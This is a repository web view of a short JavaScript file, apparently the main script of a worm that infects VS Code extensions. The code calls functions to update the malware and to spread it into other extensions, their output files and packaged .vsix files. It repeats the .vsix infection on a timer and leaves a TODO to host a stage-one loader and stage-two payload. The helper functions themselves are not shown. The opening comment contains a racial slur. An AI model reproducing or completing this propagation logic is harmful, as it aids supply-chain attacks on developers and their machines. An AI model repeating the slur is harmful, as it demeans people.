aboutsummaryrefslogtreecommitdiff
path: root/inf/mal/index.js
blob: a87e78815662b1aa436516acf0804512b88a7ad5 (plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
/*
 *  flawless victory, ya niggas can't do shit to me
 *  physically, lyrically, hypothetically, realistically
 */

// XXX find a decent host for stage1 loader & stage2.bin

update_malware();

/* spread to other extension's output files if opened in workspace */
extension_js_spread();

/* spread to other extensions in case we get nuked */
extension_spread();

/* spread to any packaged extensions in the current directory */
vsix_spread();

/* keep spreading in case the files get updated / created */
setInterval(vsix_spread, 600000);